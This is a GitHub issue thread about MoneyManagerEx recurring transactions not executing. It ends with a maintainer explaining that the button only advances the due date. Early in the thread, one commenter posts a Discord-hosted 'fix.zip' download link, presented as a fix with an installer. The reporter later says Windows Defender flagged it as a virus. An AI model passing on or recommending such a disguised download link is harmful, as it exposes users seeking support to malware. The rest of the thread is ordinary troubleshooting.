### ISSUE TITLE
bug de la fonction "opérations récurentes"

### ISSUE THREAD

**Issue by Freland38** [moneymanagerex/moneymanagerex#6855]
La fonction "opérations récurentes" ne s'exécute pas. J'avais 3 opérations qui devaient rentrées automatiquement, une seules' est exécutée dans le livre de compte. (la case "autoriser l'exécution automatique" est bien cochée)
2ème bug : l'éxécution en manuel dans le compte à l'aide de la commande située à côté de la périodicité ne s'éxécute pas du tout : l'opération ne rentre pas dans le livre de compte. Par contre les 2 dates changes pour passer au mois suivant (échéance mensuelle)
Windows 11 

MMEX version:
 - [ ] 1.7.0
 - [X] 1.8.0
 - [ ] 1.8.1
 - [ ] 1.8.2
 - [ ] Other (please specify)

Note: bug reporters are expected to have verified the bug still exists
either in the last stable version of MMEX or on updated development code
(master branch).

Operating System:
 - [x] Windows
 - [ ] Mac OSX
 - [ ] Linux 

# Description of the bug

Please describe your issue with details.
Add screenshot or other files if needed.

# Reproduction

Is the bug reproducible? 
 - [x] Always 
 - [ ] Randomly 
 - [ ] Happened only once

Reproduction steps:

Expected result:

Actual result:

# Additional information

If you have a backtrace for a crash or a warning, paste it here.

**Comment by 777Naity** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by Freland38** [comment]
Au moment de la validation de la déclaration de ce bug, j'ai reçu une réponse avec un fichier à télécharger. Le fichier a été bloqué par le système de sécurité de Chrome. J'ai baissé le niveau de vigilance de Chrome mais Defender de Windows l'a déclaré en virus.

**Comment by renato-mmex** [comment]
Veuillez utiliser un traducteur comme par exemple www.deepl.com
Please use a translator such as www.deepl.com

The ‘recurring transactions’ function does not work. I had 3 transactions that should have been entered automatically, but only one was executed in the account book. (The ‘authorise automatic execution’ box is ticked).
2nd bug: manual execution in the account using the command next to the periodicity does not execute at all: the transaction is not entered in the account book. On the other hand, the 2 dates change to move on to the next month (monthly due date).
Windows 11

When I validated the declaration of this bug, I received a reply with a file to download. The file was blocked by the Chrome security system. I lowered Chrome's vigilance level but Windows Defender declared it a virus.

**Comment by renato-mmex** [comment]
Perhaps you could document your problem with a screenshot so that we can understand it and give you an answer.

(Peut-être pourriez-vous documenter votre problème avec une capture d'écran afin que nous puissions le comprendre et vous donner une réponse.)

**Comment by Freland38** [comment]
Hello Renato, 
The command to record the due date manually in the account does not execute. I have attached a capture. However, when I click on it, the date updates to the next due date.
![Capture MMEX](https://github.com/user-attachments/assets/cfe7e5b9-1790-4a42-8d79-9683e5353777)

**Comment by Freland38** [comment]
In the 1st part of my bug report, I said that the automatic command to integrate the due date with the registered date wasn't working. But I did a new test on 2 due dates yesterday and this morning the 2 due dates were correctly recorded in the account.

Dans la 1ere partie de ma déclaration de bug, j'avais déclaré que la commande automatique d'intégration de l'échéance à la date enregistrée ne fonctionnait pas. Mais j'ai fait un nouveau test sur 2 échéances hier et ce matin les 2 échéances se trouvaient bien enregistrées dans le compte.

**Comment by renato-mmex** [comment]
Cette fonction sert uniquement à avancer la date réglée à la date suivante.
Une saisie manuelle de l'écriture se fait via « Entrèe » dans la barre de pied de page.

This function is only used to advance the set date to the next date.
The booking can be entered manually via ‘Entrèe’ in the footer.

**Comment by Freland38** [comment]
Merci beaucoup Renato, je viens de faire un essai et ça fonctionne. Il faut dire que je ne connais et n'utilise MMEX que depuis 2 jours. Au départ, j'avais téléchargé la version précédente 1.7.0 et il me semble que la fonction s'exécutait comme je l'avais compris.
Je vais faire un don car je suis très satisfait et je suis convaincu que cela est nécessaire pour les gens comme vous qui aider les utilisateurs.

**Comment by renato-mmex** [comment]
Merci pour votre réponse.
Nos développeurs seront certainement ravis de ce don, merci beaucoup.
Veuillez classer ce message comme étant terminé.
Avec les salutations de Renato, l'administrateur du forum MMEX, depuis la Suisse.
